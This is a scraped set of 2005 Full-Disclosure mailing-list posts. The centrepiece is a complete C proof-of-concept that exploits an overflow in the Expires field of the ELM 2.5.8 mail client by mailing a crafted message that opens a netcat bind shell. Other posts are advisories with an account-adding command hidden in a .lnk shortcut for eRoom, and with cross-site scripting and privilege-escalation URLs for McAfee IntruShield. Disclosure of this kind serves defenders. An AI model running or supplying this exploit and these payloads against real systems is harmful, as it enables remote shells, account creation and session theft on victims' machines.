On 26/09/05, Josh Perrymon [EMAIL PROTECTED] wrote: I just think that too many consultants are relying on automated tools to do their job. Don't get me wrong... I use them on every project- Nmap Nessus AMAP MetaSploit HPING2 VomiT Acunetix Etc. concur. Hmm, never used Acunetix, *googles* btw, for what it matters, I meant I have never used CORE or CANVAS in an audit.. regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ELM 2.5.8 Remote Exploit POC
#include stdio.h
#include stdlib.h
#include string.h
#include unistd.h
#define BUFFER 83
#define EMAIL tmpmail
#define STRING `nc -l -p 12345 -e /bin/sh`##
#define SYSLOC 0x42041e50
#define STRLOC 0x4001a207
#define EXTLOC 0x4202b0f0
char expire[]=\x45\x78\x70\x69\x72\x65\x73\x3A\x20;
int main(int argc, char **argv)
{
char buffer[BUFFER];
char *email = NULL;
char *user = NULL;
int i;
long extloc, sysloc, strloc;
FILE *fp;
if(argc != 2) {
puts(Usage: ./elmex [EMAIL PROTECTED]);
exit(EXIT_FAILURE);
}
if(strlen(argv[1]) 50) {
puts([-] Sorry, email address too long!);
exit(EXIT_FAILURE);
}
user = (char *)malloc(strlen(argv[1]));
if(!user) {
perror(malloc);
exit(EXIT_FAILURE);
}
email = EMAIL;
memset(user, '\0', strlen(argv[1]));
memcpy(user, argv[1], strlen(argv[1]));
puts(\nExploit for elm email client 2.5.8 overflow in Expires field);
puts(Tested: Redhat on quiet a Sunday by c0ntex[at]open-security.org\n);
extloc = EXTLOC;
sysloc = SYSLOC;
strloc = STRLOC;
memset(buffer, '\0', BUFFER);
memcpy(buffer, expire, strlen(expire));
for(i = strlen(expire); i 53; i++)
*(buffer+i) = 0x41;
for(i = 53; i 57; i += 4)
*(long *)buffer[i] = sysloc;
for(i = 57; i 61; i++)
*(long *)buffer[i] = extloc;
for(i = 61; i 65; i += 4)
*(long *)buffer[i] = strloc;
memcpy(buffer[65], STRING, strlen(STRING));
buffer[BUFFER] = '\0';
puts([-] Adding exploit buffer to email);
fp = fopen(email, w);
if(!fp) {
perror(fopen); free(user);
exit(EXIT_FAILURE);
}
fprintf(fp,
From: User c0ntex [EMAIL PROTECTED] Sun Aug
21 13:37:00 2005\n
Return-Path: [EMAIL PROTECTED]
Date: Sun, 21 Aug 2005 13:37:00 %s\n
Subject: Insecure?\n
To: %s\n
%s\n, STRING, user, buffer);
fclose(fp);
printf([-] Emailing %s with malicious content\n, argv[1]);
if(system(/bin/cat ./tmpmail | /usr/sbin/sendmail -t) 0) {
perror(system); free(user);
exit(EXIT_FAILURE);
}
puts([-] Connect to system on port 12345 to get your shell\n);
if(unlink(EMAIL) 0)
perror(unlink);
free(user);
return EXIT_SUCCESS;
}
--
regards
c0ntex
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Fwd: [Full-disclosure] RE: eRoom Multiple Security Issues
The .lnk file can be anything and IS only executed once the user clicks on it. i.e, I'm a vendor with access to the site, I upload my cmd.exe.lnk file in my example, renamed to budget_info and send an email announcement via eroom to all users to come look at the new budget. When the users of the site then click on the file, it silently adds a user account to their PC. The problem is due to the fact that the eRoom plugin will silently download and run the file without popping up any message. The cookie code can be used for any cookie stealing yes, thats not the point and the code is just an example. the problem is that one can replay eRooms cookies and gain access once you have harvested them via a javascript embedded html file, or what ever. gettting your HTML on the site is trivial if you have access to eRoom, as there is always somewhere usually that you can post. Once you have that file uploaded, you can reference anywhere you like via a href IFRAME and the likes. regards c0ntex On 07/07/05, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: I don't see how uploading a .LNK file to E-Room would cause the file to be executed. Wouldn't a .LNK file be treated as an Internet Link and attempt to be rendered in Internet Explorer? Any chance of you posting your exact .lnk file to the list? I must be missing something inbetween the jigs and the reels... With the code you supplied for the cookie grabbing, couldn't you use that same code for any cookie harvesting as long as you know the name of the cookie you want to grab? Of course the trick would be to get a link to your HTML code up on the site you wish to harvest the cookies from. Exibar - Original Message - From: c0ntex [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Wednesday, July 06, 2005 3:12 PM Subject: [Full-disclosure] eRoom Multiple Security Issues /* * $ An open security advisory #9 - eRoom v6.* Vulnerabilities * 1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com 2: Bug Released: July 06 2005 3: Bug Impact Rate: Medium / Hi 4: Bug Scope Rate: Remote * $ This advisory and/or proof of concept code must not be used for commercial gain. * Documentum eRoom http://www.documentum.com Documentum eRoom enables enterprises to become more productive, efficient, and agile by bringing together people, processes, and content. In fact, more than 1000 Global 2000 enterprises use Documentum eRoom to optimize key projects and processes. eRoom has some vulnerabilities in that it does not deal with attached files or handle cookies in a secure manner. This being the case, it is possible to abuse trust between users utilising the system, execute code on systems of valid users and compromise user accounts by stealing/replaying their session cookies. Issues -- 1) Attaching malicious files 2) Stealing and replaying cookies - I am unable to verify if the replay attack and cookie time out effects all versions of eRoom 6.* as I do not have access to a default installation and am unable to find a demo version that I can use, though the chances are it is. I can guarantee that cookies can be stolen from all versions and java script / HTML can be run from within an attached file. 1 - Attached files -- eRoom allows a user to attach files into the website to share with other users, however there is no restriction on the type of file that can be attached. This can be abused to remotly compromise the systems of eRooms users. If an .exe file is uploaded, when the user clicks on the file the usual what do you want to do with this file box pops up and as such, this does not seem a big problem. However, this check can be bypassed by uploading a .lnk file (windows shortcut) to the site, which contains any command you wish, I used the following: %SystemRoot%\system32\cmd.exe /k net user hacker hackerpass /ADD proving it is possible to have a command run on the remote users system once the user clicks on the file. Notice there is no further user interaction required and no pop-up box is recieved, the .lnk just gets downloaded by the eRoom plugin in the background and gets run, adding a user account to the system. There are no warnings given to the user about the file containing a link to an executable image, and as such, it remains an invisible compromise. The downloaded file will be left
[Full-disclosure] McAfee Intrushield IPS Abuse
/* * $ An open security advisory #8 - McAfee Intrushield IPS Management Console Abuse * 1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com 2: Bug Released: July 06 2005 3: Bug Impact Rate: Medium / Hi 4: Bug Scope Rate: Local / Remote * $ This advisory and/or proof of concept code must not be used for commercial gain. * McAfee IntruShield Security Management System http://www.mcafeesecurity.com/us/products/mcafee/network_ips/category.htm The McAfee IntruShield Security Management System is an advanced solution for administering IntruShield sensor appliance deployments. The IntruShield Security Management System (ISM) can support both large and small network intrusion prevention system (IPS) deployments and can scale up to several hundred sensor appliances. By integrating a comprehensive set of Best-in-Class security management functions, the IntruShield Security Management System dramatically simplifies and streamlines the complexities associated with IPS configuration, policy compliance, and threat and response management. I have found some security vulnerabilities in this product whereby a user can elevate their privileges from a user that can only view alerts logged by remote sensors, to a scenario where the user can gain access to acknowledge, accept and delete alerts and access the Management Console. It is also possible to inject malicious HTML and _javascript_ into the URLS and have this malicious script run on the clients machine, allowing for account information hijacking. A new version has been released to address these bugs and can be downloaded from their site. */ Issues: 1) Inject HTML 2) Inject _javascript_ 3) Access privileged reports 4) Acknowledge and delete alerts 5) Gain access to Management Console Note: for issues 1 - 4, the attacker needs a valid user account. 1) It is possible to embed HTML into the MISMS. This could potentially allow phishing attacks to be performed against a valid Manager account. https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=falsefaultResourceName=Manager domainName=%2FDemo%3A0resourceName=%2FDemo%3A0%2FManagerresourceType=Manager topMenuName=SystemHealthManagersecondMenuName=FaultsresourceId=-1thirdMenuName=iframe%20src= http://www.mcafeesecurity.com/us/about/press/corporate/2005/20050411_185504.htm%20width=800%20height=600 /iframeseverity=criticalcount=1 2) It is possible to embed _javascript_ into the MISMS and have the embedded script execute in the security context of the user browsing the Management System. https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=falsefaultResourceName=Manager domainName=DemoresourceName=scriptalert(There could be trouble ahead)/scriptscriptalert(document.cookie) /scriptresourceType=ManagertopMenuName=SystemHealthManagersecondMenuName=FaultsresourceId=-1thirdMenuName= Criticalseverity=criticalcount=1 3) It is possible to access the restricted "Generate Reports" section of the MISMS and as such, a non-privileged user can gain important information regarding the configuration and set-up of the IP devices being managed by the Service. This can be achieved by simply changing the Access option from false to true. https://intrushield:443/intruvert/jsp/reports/reports-column-center.jsp?monitoredDomain=%2FDemo selectedDomain=0fullAccessRight=true 4) It is possible to acknowledge, de-acknowledge and delete alerts from the MISMS console by modifying URL's sent to the system by simply changing the Access option from false to true. https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=truefaultResourceName=Manager domainName=%2FDemo%3A0resourceName=%Demo%3A0%2FManagerresourceType=Manager topMenuName=SystemHealthManagersecondMenuName=FaultsresourceId=-1thirdMenuName=Criticalseverity= criticalcount=1 Each change is emailed out to the administrator, however the email only says that someone made a change. 5) As default, all user ID values are passed in the URL in the clear, meaning that it is trivial for an attacker to brute force accounts until a privileged Manager account is found. An example of this would look similar to: https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=1logo=intruvert.gif https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=2logo=intruvert.gif https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=3logo=intruvert.gif https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=4logo=intruvert.gif Th
